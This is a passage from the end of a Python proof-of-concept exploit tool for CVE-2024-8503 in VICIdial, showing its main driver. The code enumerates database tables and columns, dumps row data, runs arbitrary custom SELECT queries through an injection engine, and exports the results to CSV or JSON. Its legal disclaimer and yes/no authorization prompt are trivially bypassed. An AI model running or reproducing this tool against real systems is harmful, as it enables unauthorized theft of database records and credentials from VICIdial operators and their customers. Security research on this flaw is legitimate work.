print(f"[+] Metadata keys: {', '.join(sorted(METADATA_QUERIES.keys()))}")
def main():
"""Main entry point"""
start_time = time.time()
OutputFormatter.print_banner()
args = parse_arguments()
if args.self_check:
run_self_check()
return
if not args.url:
print("[-] Missing required argument: --url")
return
print("\n[!] LEGAL DISCLAIMER:")
print(" This tool is for AUTHORIZED SECURITY TESTING ONLY.")
print(" Unauthorized access is ILLEGAL. Proceed only with written permission.\n")
response = input("Do you have authorization to test this target? (yes/no): ").strip().lower()
if response != 'yes':
print("\n[!] Authorization required. Exiting.")
return
scan_state = ScanState()
# Check for resumable scan
if scan_state.get_target() and scan_state.get_target() == (args.url.rstrip('/') + args.path):
if scan_state.show_resume_prompt():
print("[+] Resuming from previous scan...")
else:
scan_state.clear_state()
print("\n[+] Initializing scanner...")
print(f"[+] Target: {args.url}{args.path}")
print(f"[+] Limits: Tables={DEFAULT_TABLE_LIMIT}, Columns={MAX_COLUMN_LIMIT}, Rows={MAX_ROW_LIMIT}")
scanner = VulnerabilityScanner(args.url, args.path)
if not scanner.initialize(skip_vuln_check=args.skip_vuln_check):
print("\n[-] Initialization failed. Exiting.")
send_notification("VICIdial PoC", "Scan failed - initialization error")
return
scan_state.set_target(scanner.target)
if args.interactive:
interactive = InteractiveMode(scanner, scan_state)
interactive.run()
duration = time.time() - start_time
print(f"\n[+] Total time: {duration/60:.1f} minutes")
send_notification("VICIdial PoC", f"Interactive scan completed in {duration/60:.1f} minutes")
play_completion_sound()
return
metadata_queries = METADATA_QUERIES
if args.metadata:
results = {}
queries = metadata_queries if 'all' in args.metadata else {k: metadata_queries[k] for k in args.metadata if k in metadata_queries}
for name, query in queries.items():
result = scanner.extract_metadata(name, query)
if result:
results[name] = result
scan_state.update_metadata(name, result)
OutputFormatter.print_metadata_summary(results)
if args.export:
OutputFormatter.export_json(results, args.export)
if args.list_tables:
tables = scanner.list_tables()
if tables:
scan_state.update_tables(tables)
OutputFormatter.print_table_list(tables)
if args.get_columns:
columns = scanner.get_table_columns(args.get_columns, args.column_limit)
if columns:
scan_state.update_table_columns(args.get_columns, columns)
OutputFormatter.print_columns_list(args.get_columns, columns)
if args.table and args.columns:
columns = [c.strip() for c in args.columns.split(',')]
data = scanner.extract_table_data(args.table, columns, args.rows)
OutputFormatter.print_table_data(args.table, columns, data)
if args.export:
OutputFormatter.export_csv(columns, data, args.export)
if args.auto_extract:
columns, data = scanner.auto_extract_table(args.auto_extract)
if columns and data:
scan_state.update_table_columns(args.auto_extract, columns)
OutputFormatter.print_table_data(args.auto_extract, columns, data)
if args.export:
OutputFormatter.export_csv(columns, data, args.export)
if args.custom_query:
query = args.custom_query if args.custom_query.startswith('SELECT') else f"SELECT {args.custom_query}"
print(f"\n[+] Executing: {query}")
sys.stdout.write("[+] Result: ")
sys.stdout.flush()
try:
result = scanner.engine.extract_string(query)
print(f"\n[+] {repr(result)}")
except Exception as e:
print(f"\n[-] Error: {e}")
if args.full_scan:
interactive = InteractiveMode(scanner, scan_state)
interactive.full_scan()
duration = time.time() - start_time
print("\n[+] Scan complete!")
print(f"[+] Total time: {duration/60:.1f} minutes")
print("[+] Remember: All operations were READ-ONLY")
print("[+] CVE-2024-8503 - CRITICAL Severity\n")
send_notification("VICIdial PoC", f"Scan completed in {duration/60:.1f} minutes")
play_completion_sound()
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
print("\n\n[!] Interrupted by user. Exiting...")
sys.exit(0)
except Exception as e:
print(f"\n[-] Unexpected error: {e}")
sys.exit(1)